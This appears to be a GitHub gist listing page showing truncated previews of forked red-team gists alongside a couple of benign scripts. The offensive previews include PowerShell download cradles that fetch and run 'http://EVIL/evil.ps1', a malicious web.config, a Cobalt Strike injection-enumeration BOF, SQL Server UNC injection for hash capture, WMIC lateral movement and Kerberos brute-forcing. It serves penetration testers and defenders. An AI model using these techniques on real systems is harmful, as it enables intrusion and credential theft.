joeleonjr / Get-PII2.ps1

Created April 6, 2023 19:55 — forked from mritsurgeon/Get-PII2.ps1

Get-PII (Protection of Personal Identifiable Information)

	function Log {
	<#
	.Synopsis
	Function to log input string to file and display it to screen

	.Description
	Function to log input string to file and display it to screen. Log entries in the log file are time stamped. Function allows for displaying text to screen in different colors.

	.Parameter String
	The string to be displayed to the screen and saved to the log file

joeleonjr / twitter_unfollower.js

Created June 2, 2021 10:42 — forked from nytr0gen/twitter_unfollower.js

Twitter Nuclear Unfollow

	// 1. Go to your Following page. Mine would be https://twitter.com/nytr0gen_/following
	// 2. Run this script in the Console. Change maxUnfollows to anything you want.
	// 3. Check in from time to time and run it again if it fails.

	sendUnfollow = () => document.querySelector('[data-testid=UserCell] [data-testid*=unfollow] span span').click();
	confirmUnfollow = () => document.querySelector('[data-testid=confirmationSheetConfirm] span span').click();
	sleep = ms => new Promise(r => setTimeout(r, ms));

	i = 0;
	maxUnfollows = 1000;

joeleonjr / EnumCLR.c

Created April 2, 2021 02:09 — forked from G0ldenGunSec/EnumCLR.c

Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.

	#include <string.h>
	#include <stdio.h>
	#include <windows.h>
	#include <psapi.h>
	#include "beacon.h"


	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD);
	DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
	DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD);

joeleonjr / downloader web.config

Created March 8, 2021 15:23 — forked from gazcbm/downloader web.config

Malicious web.config's

	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
	<system.webServer>
	<handlers accessPolicy="Read, Script, Write">
	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
	</handlers>
	<security>
	<requestFiltering>
	<fileExtensions>
	<remove fileExtension=".config" />

joeleonjr / SQL Server UNC Path Injection Cheatsheet

Created February 10, 2021 17:19 — forked from nullbind/SQL Server UNC Path Injection Cheatsheet

SQL Server UNC Path Injection Cheatsheet

	This is a list of SQL Server commands that support UNC path [injections] by default.
	The injections can be used to capture or replay the NetNTLM password hash of the
	Windows account used to run the SQL Server service. The SQL Server service account
	has sysadmin privileges by default in all versions of SQL Server.

	Note: This list is most likely not complete.

	-----------------------------------------------------------------------
	-- UNC Path Injections Executable by the Public Fixed Server Role
	-----------------------------------------------------------------------

joeleonjr / DownloadCradles.ps1

Created January 27, 2021 14:02 — forked from HarmJ0y/DownloadCradles.ps1

Download Cradles

	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object

joeleonjr / wmicLateralMovement.txt

Created January 24, 2021 20:42 — forked from G0ldenGunSec/wmicLateralMovement.txt

WMIC Service Modification for Lateral Movement

	As always, only for use on networks you own or have permission to test against.

	Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
	If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.

	The process involves a total of four commands, three of which can be combined on the command line to form one large block.

	Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
	wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName

joeleonjr / NtMonitor.py

Created January 17, 2021 21:43 — forked from matterpreter/NtMonitor.py

Frida script to spawn a process and monitor Native API calls

joeleonjr / kerberos_attacks_cheatsheet.md

Created January 17, 2021 21:41 — forked from rvrsh3ll/kerberos_attacks_cheatsheet.md

A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

joeleonjr / fsharp.fsscript

Created January 17, 2021 15:44 — forked from bohops/fsharp.fsscript

fsi.exe inline execution

	#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"

	open System.Management.Automation
	open System.Management.Automation.Runspaces
	open System

	let runSpace = RunspaceFactory.CreateRunspace()
	runSpace.Open()
	let pipeline = runSpace.CreatePipeline()